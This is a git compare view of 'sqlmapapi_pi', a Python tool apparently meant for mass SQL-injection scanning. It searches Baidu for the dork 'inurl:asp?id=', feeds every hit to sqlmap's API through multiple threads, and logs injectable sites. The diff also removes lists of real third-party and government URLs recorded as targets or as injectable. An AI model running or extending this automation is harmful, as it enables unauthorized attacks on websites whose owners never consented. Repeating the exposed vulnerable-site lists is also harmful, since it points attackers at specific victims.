Compare commits
10 Commits
813f305db8
...
57d47e8a00
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
57d47e8a00 | ||
|
|
ef2da26e23 | ||
|
|
e4b03bf86d | ||
|
|
4d9755bf5e | ||
|
|
84a098efbb | ||
|
|
8f8ebddb95 | ||
|
|
a2267acb0c | ||
|
|
ee4cd19f36 | ||
|
|
69b595c060 | ||
|
|
0d74222aaa |
4
.gitignore
vendored
Normal file
4
.gitignore
vendored
Normal file
@@ -0,0 +1,4 @@
|
||||
*.pyc
|
||||
.DS_Store
|
||||
*.log
|
||||
data/*.*
|
||||
66
AutoSqli.py
66
AutoSqli.py
@@ -1,20 +1,22 @@
|
||||
#!/usr/bin/python
|
||||
#-*-coding:utf-8-*-
|
||||
from __future__ import absolute_import, print_function
|
||||
|
||||
import requests
|
||||
import time
|
||||
import json
|
||||
import threading
|
||||
import Queue
|
||||
from search.baidu import *
|
||||
from search import baidu
|
||||
import logging
|
||||
from config import LOG, API_URL
|
||||
|
||||
|
||||
class AutoSqli(object):
|
||||
|
||||
"""
|
||||
使用sqlmapapi的方法进行与sqlmapapi建立的server进行交互
|
||||
|
||||
"""
|
||||
|
||||
def __init__(self, server='', target='',data = '',referer = '',cookie = ''):
|
||||
super(AutoSqli, self).__init__()
|
||||
self.server = server
|
||||
@@ -28,17 +30,22 @@ class AutoSqli(object):
|
||||
self.referer = referer
|
||||
self.cookie = cookie
|
||||
self.start_time = time.time()
|
||||
self.logger = logging.getLogger('app.run')
|
||||
self.logger.info('Creating an instance of AutoSqli for {0}.'.format(self.target))
|
||||
|
||||
def task_new(self):
|
||||
try:
|
||||
self.taskid = json.loads(
|
||||
requests.get(self.server + 'task/new').text)['taskid']
|
||||
#print 'Created new task: ' + self.taskid
|
||||
if len(self.taskid) > 0:
|
||||
return True
|
||||
return False
|
||||
except ConnectionError:
|
||||
self.logging.error("sqlmapapi.py is not running")
|
||||
|
||||
def task_delete(self):
|
||||
json_kill=requests.get(self.server + 'task/' + self.taskid + '/delete').text
|
||||
json_kill = requests.get(self.server + 'task/' + self.taskid + '/delete').text
|
||||
# if json.loads(requests.get(self.server + 'task/' + self.taskid + '/delete').text)['success']:
|
||||
# #print '[%s] Deleted task' % (self.taskid)
|
||||
# return True
|
||||
@@ -46,7 +53,7 @@ class AutoSqli(object):
|
||||
|
||||
def scan_start(self):
|
||||
headers = {'Content-Type': 'application/json'}
|
||||
print "starting to scan "+ self.target +".................."
|
||||
self.logger.debug("Starting to scan "+ self.target +"..................")
|
||||
payload = {'url': self.target}
|
||||
url = self.server + 'scan/' + self.taskid + '/start'
|
||||
t = json.loads(
|
||||
@@ -74,9 +81,10 @@ class AutoSqli(object):
|
||||
#print 'not injection\t'
|
||||
pass
|
||||
else:
|
||||
f=open('data/injection.txt','a')
|
||||
f = open('data/injection.txt','a')
|
||||
f.write(self.target+'\n')
|
||||
print 'injection \t'
|
||||
f.close()
|
||||
self.logger.warning('injection \t')
|
||||
|
||||
def option_set(self):
|
||||
headers = {'Content-Type': 'application/json'}
|
||||
@@ -134,28 +142,46 @@ class myThread(threading.Thread):
|
||||
objects=self.q.get()
|
||||
result=objects.run()
|
||||
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
urls=[]
|
||||
print 'the program starts!'
|
||||
key='inurl:asp?id='
|
||||
pages=3
|
||||
urls=geturl(key,pages)
|
||||
def main():
|
||||
import argparse
|
||||
parser = argparse.ArgumentParser()
|
||||
parser.add_argument('-n', '--num', default=4, nargs='?', type=int, dest='num', help="Thread num")
|
||||
parser.add_argument('-p', '--page', default=3, nargs='?', type=int, dest='page', help="Search Page num")
|
||||
parser.add_argument('-d', '--log', default=LOG["filename"], nargs='?', type=str, dest='log', help="The path of debug log")
|
||||
args = parser.parse_args()
|
||||
logger = logging.getLogger('app')
|
||||
logger.setLevel(LOG["level"])
|
||||
fh = logging.FileHandler(args.log)
|
||||
fh.setLevel(LOG["level"])
|
||||
formatter = logging.Formatter(LOG['format'], LOG["datefmt"])
|
||||
fh.setFormatter(formatter)
|
||||
sh = logging.StreamHandler()
|
||||
sh.setLevel(LOG["level"])
|
||||
sh.setFormatter(formatter)
|
||||
logger.addHandler(fh)
|
||||
logger.addHandler(sh)
|
||||
urls = []
|
||||
logger.info('the program starts!')
|
||||
pages = args.page
|
||||
key = 'inurl:asp?id='
|
||||
urls = baidu.geturl(key, pages)
|
||||
#print urls
|
||||
workQueue=Queue.Queue()
|
||||
workQueue = Queue.Queue()
|
||||
for tar in urls:
|
||||
s = AutoSqli('http://127.0.0.1:8775', tar)
|
||||
s = AutoSqli(API_URL, tar)
|
||||
workQueue.put(s)
|
||||
threads = []
|
||||
nloops = range(4) #threads Num
|
||||
nloops = range(args.num) #threads Num
|
||||
for i in nloops:
|
||||
t = myThread(workQueue,i)
|
||||
t = myThread(workQueue, i)
|
||||
t.start()
|
||||
threads.append(t)
|
||||
for i in nloops:
|
||||
threads[i].join()
|
||||
print "Exiting Main Thread"
|
||||
logger.info("Exiting Main Thread")
|
||||
|
||||
if __name__ == '__main__':
|
||||
main()
|
||||
|
||||
|
||||
|
||||
|
||||
17
README.md
Normal file
17
README.md
Normal file
@@ -0,0 +1,17 @@
|
||||
## sqlmapapi_pi 批量注入工具
|
||||
------------
|
||||
**Intorduction:**
|
||||
|
||||
- 本程序是基于[manning23](https://github.com/manning23)的项目二次开发,参考地址 [click me](http://drops.wooyun.org/tips/6653)
|
||||
- 本程序利用百度爬取特定的url链接,然后调用sqlmapapi(sqlmap自带的批量接口),进行注入的判断。
|
||||
- AutoSqli.py中option的设置可参考set_option.txt;可自定义判断注入的方法,例如,基于时间/布尔等。
|
||||
|
||||
**Useage:**
|
||||
- 在sqlmap的目录下执行`python sqlmapapi.py -s`进行监听操作。
|
||||
- 运行AutoSqli.py `python AutoSqli.py` 参数可通过`-h`查看
|
||||
|
||||
**Tips:**
|
||||
* 这里要注意的是在代码里自定义搜索关键字:`key='inurl:asp?id='`
|
||||
* 以及线程数:`nloops = range(4) #threads Num`
|
||||
* 建议线程数不要太多,以免卡死。
|
||||
* 请勿利用工具做违法犯罪的事情。
|
||||
18
config.py
Normal file
18
config.py
Normal file
@@ -0,0 +1,18 @@
|
||||
#!/bin/env python
|
||||
# -*- coding=utf-8 -*-
|
||||
import logging
|
||||
|
||||
API_URL = "http://127.0.0.1:8775"
|
||||
|
||||
LEVELS = {'debug': logging.DEBUG,
|
||||
'info': logging.INFO,
|
||||
'warning': logging.WARNING,
|
||||
'error': logging.ERROR,
|
||||
'critical': logging.CRITICAL}
|
||||
|
||||
LOG = {
|
||||
"level" : LEVELS["debug"],
|
||||
"filename" : "autosqli.log",
|
||||
"format" : '[%(asctime)s] %(levelname)-8s %(name)-12s %(message)s',
|
||||
"datefmt" : '%Y-%m-%d %H:%M:%S'
|
||||
}
|
||||
7
data/injection.txt
Executable file → Normal file
7
data/injection.txt
Executable file → Normal file
@@ -1,6 +1 @@
|
||||
http://www.lamarche.com.tw/production_detail.php?shop_category=64&sn=248
|
||||
http://www.70jj.com/shop/index.php?shop_id=1
|
||||
http://www.cosmax.com.hk/products_detail.php?product_id=17
|
||||
http://www.etron.com/en/products/u3hc_detial.php?Product_ID=5
|
||||
http://www.fembooks.com.tw/indexstore.php?product_id=5423
|
||||
http://www.guangzhouflower.net.cn/product.php?pid=12
|
||||
http://www.example.com
|
||||
@@ -1,20 +0,0 @@
|
||||
http://www.99166.com/zjinfo.asp?id=5
|
||||
http://www.yh8z.com/Secondary/guding.asp?Id=68&Parent_ID=18&Type_Class=news&GS_Class=22
|
||||
http://www.gdkszx.com.cn/ksxx/kszc_show.asp?id=2205
|
||||
http://www.smxs.gov.cn/viewtexti.asp?id=275079&npage=6
|
||||
http://www.juancheng.gov.cn/wsbs-view.asp?id=9285
|
||||
http://rc.sz.zj.cn/company.asp?id=4291
|
||||
http://www.law-lib.com/fxj/fxj.asp?id=940
|
||||
http://www.kfws.gov.cn/Article_read.asp?id=2289
|
||||
http://www.zjghtcm.com/new_show.asp?id=1178
|
||||
http://www.medsci.cn/sci/journal.asp?id=0bc61099
|
||||
http://www.dylaw.gov.cn/zhongc/web60/classshow.asp?id=51848&classid=15
|
||||
http://club.kdnet.net/dispbbs.asp?id=11095423&boardid=1
|
||||
http://people.rednet.cn/PeopleShow.asp?ID=2410432
|
||||
http://www.dhzsxx.com/ShowNews.asp?id=1591
|
||||
http://www.chinawutong.com/co/huoyuan_01/index.asp?id=213633
|
||||
http://news.chinaxinge.com/shownews.asp?id=53866&sjm=49600b363e048e05
|
||||
http://www.gxxgty.com/news_show.asp?id=1583
|
||||
http://szb.keq0475.com/Qnews.asp?ID=49506
|
||||
http://www.cyfy.cn/kssz.asp?id=42
|
||||
http://www.szkweekly.com/List.asp?ID=54284
|
||||
Binary file not shown.
@@ -1,11 +1,16 @@
|
||||
#coding: utf-8
|
||||
from __future__ import unicode_literals
|
||||
|
||||
import urllib2
|
||||
import string
|
||||
import urllib
|
||||
import re
|
||||
import random
|
||||
import logging
|
||||
|
||||
user_agents = ['Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Firefox/23.0', \
|
||||
__all__ = ["geturl"]
|
||||
|
||||
USER_AGENTS = ['Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Firefox/23.0', \
|
||||
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0', \
|
||||
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533+ \
|
||||
(KHTML, like Gecko) Element Browser 5.0', \
|
||||
@@ -18,26 +23,31 @@ user_agents = ['Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Fire
|
||||
Chrome/28.0.1468.0 Safari/537.36', \
|
||||
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; TheWorld)']
|
||||
|
||||
def baidu_search(keyword,pn):
|
||||
p= {'wd': keyword}
|
||||
res=urllib2.urlopen(("http://www.baidu.com/s?"+urllib.urlencode(p)+"&pn={0}&cl=3&rn=10").format(pn)) #rn为每页的显示数目 pn表示当前显示的是第pn条搜索结果
|
||||
html=res.read()
|
||||
logger = logging.getLogger('app.baidu')
|
||||
|
||||
def baidu_search(keyword, pn):
|
||||
p = {'wd': keyword}
|
||||
res = urllib2.urlopen(("http://www.baidu.com/s?"+urllib.urlencode(p)+"&pn={0}&cl=3&rn=10").format(pn)) #rn为每页的显示数目 pn表示当前显示的是第pn条搜索结果
|
||||
html = res.read()
|
||||
return html
|
||||
def getList(regex,text): #将获取的url去重并存入list
|
||||
|
||||
def getList(regex, text): #将获取的url去重并存入list
|
||||
arr = []
|
||||
res = re.findall(regex, text)
|
||||
if res:
|
||||
for r in res:
|
||||
arr.append(r)
|
||||
return arr
|
||||
def getMatch(regex,text): #匹配函数
|
||||
|
||||
def getMatch(regex, text): #匹配函数
|
||||
res = re.findall(regex, text)
|
||||
if res:
|
||||
return res[0]
|
||||
return ''
|
||||
|
||||
def is_get(url): #是否是sqlmap可识别的get型链接
|
||||
regex=r'(\S*?)\?.*=.*'
|
||||
res=re.match(regex,url)
|
||||
regex = r'(\S*?)\?.*=.*'
|
||||
res = re.match(regex,url)
|
||||
if res:
|
||||
#print res.group(1)
|
||||
return res.group(1)
|
||||
@@ -46,12 +56,12 @@ def is_get(url): #是否是sqlmap可识别的get型链接
|
||||
# def Deduplication():
|
||||
# regex=r'\S'
|
||||
|
||||
def geturl(keyword,pages): #获取url
|
||||
def geturl(keyword, pages): #获取url
|
||||
targets = []
|
||||
hosts=[]
|
||||
hosts = []
|
||||
for page in range(0,int(pages)):
|
||||
pn=(page+1)*10
|
||||
html = baidu_search(keyword,pn)
|
||||
pn = (page+1)*10
|
||||
html = baidu_search(keyword, pn)
|
||||
content = unicode(html, 'utf-8','ignore')
|
||||
arrList = getList(u"<div class=\"f13\">(.*)</div>", content) #分割页面块
|
||||
#print arrList
|
||||
@@ -61,28 +71,29 @@ def geturl(keyword,pages): #获取url
|
||||
for item in arrList:
|
||||
regex = u"data-tools='\{\"title\":\"(.*)\",\"url\":\"(.*)\"\}'"
|
||||
link = getMatch(regex,item)
|
||||
url=link[1] #获取百度改写url
|
||||
url = link[1] #获取百度改写url
|
||||
try:
|
||||
domain=urllib2.Request(url)
|
||||
r=random.randint(0,11)
|
||||
domain.add_header('User-agent', user_agents[r])
|
||||
domain.add_header('connection','keep-alive')
|
||||
response=urllib2.urlopen(domain)
|
||||
uri=response.geturl() #获取真实url
|
||||
urs=is_get(uri) #是否是传统的get型
|
||||
domain = urllib2.Request(url)
|
||||
r = random.randint(0, len(USER_AGENTS))
|
||||
domain.add_header('User-agent', USER_AGENTS[r])
|
||||
domain.add_header('connection', 'keep-alive')
|
||||
response = urllib2.urlopen(domain)
|
||||
uri = response.geturl() #获取真实url
|
||||
urs = is_get(uri) #是否是传统的get型
|
||||
if (uri in targets) or (urs in hosts) :
|
||||
continue
|
||||
else:
|
||||
targets.append(uri)
|
||||
hosts.append(urs)
|
||||
f1=open('data/targets.txt','a') #存放url链接
|
||||
f1 = open('data/targets.txt','a') #存放url链接
|
||||
f1.write(uri+'\n')
|
||||
f1.close()
|
||||
except:
|
||||
continue
|
||||
print "urls have been grabed already!!!"
|
||||
logger.info("urls have been grabed already!!!")
|
||||
return targets
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
pass
|
||||
|
||||
|
||||
BIN
search/baidu.pyc
BIN
search/baidu.pyc
Binary file not shown.
Reference in New Issue
Block a user